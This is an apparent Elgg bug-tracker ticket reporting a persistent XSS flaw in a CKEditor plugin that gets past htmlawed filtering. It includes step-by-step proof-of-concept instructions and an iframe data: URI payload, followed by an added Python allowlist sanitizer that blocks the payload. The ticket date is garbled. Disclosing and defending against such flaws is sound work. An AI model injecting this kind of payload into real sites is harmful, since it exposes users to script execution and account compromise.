If the htmlawed plugin is enabled these injections shouldn't be possible. If you do find there's a problem with htmlawed's filtering, please email security@elgg.com with the details. Thanks.
The htmlawed (v1.5) plugin is enabled. I reported the PoC to security@
Original ticket http://trac.elgg.org/ticket/1524 on 40131250-04-17 by trac user psy, assigned to unknown.
Elgg version: 1.6
The FCKEditor plugin doesn't parse some params correctly. It is possible to inject JavaScript code on the client and server side.
The injection vector is on the preformatted tag.
This bug can break the integrity of the social network.
Probed on Firefox & Chrome.
-----------------------------------------------------
[+] Elgg Release - 1.6.1, Version - 2009072201 + CKEditor v1.0
[+] Bug: HTML/XSS injection
[+] By: .:ald:. (psy)
[+] Download: http://elgg.org/downloads.php
[+] Plugin: http://community.elgg.org/pg/plugins/springs/read/385093/ckeditor-replaces-tinymce
[+] htmlawed (provides tag filtering for user input) Version: 1.5 enabled !
POC:
-login
-write new topic on CKEditor
// client side //
-click on "source html"
-enter injection vector:
<iframe src="data:text/html;charset=utf-8,%3cscript%3ealert(XSS);history.back();%3c/script%3e"></iframe>
-click on "source html" (!!!!)
// server side: (persistent XSS) //
-click on "source html"
-enter preformatted text:
-click on "source html"
<iframe src="data:text/html;charset=utf-8,%3cscript%3ealert(1);history.back();%3c/script%3e"></iframe> (!!!!) XSS (!!!!) [...]-enter vector injection:
// risks
-----------------------------------------------------
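The maintainer's reply says the server-side filter (htmlawed) is what should stop this. As an added example, not Elgg's or htmlawed's own code, the allowlist sanitizer below shows the two rules such a filter needs against the vector quoted in the ticket: an `iframe` element is dropped together with its content, and any URL attribute whose scheme is not on an allowlist (so `data:` and `javascript:`) is removed. The allowlist of tags and attributes is a hypothetical forum-post policy chosen for the example; it goes a little beyond the ticket by also stripping event-handler attributes and unquoting percent-encoded schemes before checking them.

```python
"""Allowlist HTML sanitizer (added example, not Elgg or htmlawed code).

Runs the filtering rules a server-side sanitizer needs against the
iframe/data: vector from the ticket. The allowlist policy below is
hypothetical; a real deployment would tune it to the site's needs.
"""
from html import escape
from html.parser import HTMLParser
from urllib.parse import unquote

# Hypothetical policy: what a forum post is allowed to keep.
ALLOWED_TAGS = {"p", "b", "i", "em", "strong", "pre", "code", "a",
                "br", "ul", "ol", "li"}
ALLOWED_ATTRS = {"a": {"href"}}          # everything else (onclick, style, ...) is dropped
URL_ATTRS = {"href", "src"}
SAFE_SCHEMES = {"http", "https", "mailto"}
VOID_TAGS = {"br", "img", "hr", "input", "meta", "link"}


def safe_url(value: str) -> bool:
    """True if the URL is relative or uses an allowlisted scheme.

    Percent-decodes first and strips whitespace/control characters that
    browsers ignore, so 'DATA:', 'java\\nscript:' and '%6aavascript:' are
    all recognised as schemes and rejected.
    """
    v = unquote(value).strip().lower()
    v = "".join(ch for ch in v if ch.isprintable() and not ch.isspace())
    first_segment = v.split("/", 1)[0]
    if ":" not in first_segment:          # no scheme at all: relative URL
        return True
    return first_segment.split(":", 1)[0] in SAFE_SCHEMES


class Sanitizer(HTMLParser):
    """Rebuilds markup from an allowlist; disallowed elements are removed
    along with their content (so <iframe>, <script> and their bodies go)."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skip_depth = 0   # > 0 while inside a dropped element

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            if tag not in VOID_TAGS:
                self.skip_depth += 1      # unclosed disallowed tag fails closed
            return
        if self.skip_depth:
            return
        kept = []
        for name, value in attrs:
            value = value or ""
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue
            if name in URL_ATTRS and not safe_url(value):
                continue
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_startendtag(self, tag, attrs):
        if tag not in ALLOWED_TAGS or self.skip_depth:
            return
        self.handle_starttag(tag, attrs)
        if tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_endtag(self, tag):
        if tag not in ALLOWED_TAGS:
            if tag not in VOID_TAGS and self.skip_depth:
                self.skip_depth -= 1
            return
        if self.skip_depth or tag in VOID_TAGS:
            return
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip_depth:
            # entities were decoded by the parser; re-escape so text stays text
            self.out.append(escape(data, quote=False))


def sanitize(html: str) -> str:
    parser = Sanitizer()
    parser.feed(html)
    parser.close()
    return "".join(parser.out)


if __name__ == "__main__":
    # The vector from the ticket, wrapped in the preformatted tag it targets.
    poc = ('<pre><iframe src="data:text/html;charset=utf-8,'
           '%3cscript%3ealert(XSS);history.back();%3c/script%3e"></iframe>'
           'harmless text</pre>')
    print(sanitize(poc))   # <pre>harmless text</pre>
```

Because the sanitizer rebuilds the output from the parsed tree rather than deleting substrings, an attribute that survives is re-quoted and re-escaped, and text content is re-escaped after entity decoding, so `&lt;script&gt;` inside a `<pre>` stays literal text. Unclosed disallowed elements swallow the rest of the post; for a sanitizer that is the right failure direction.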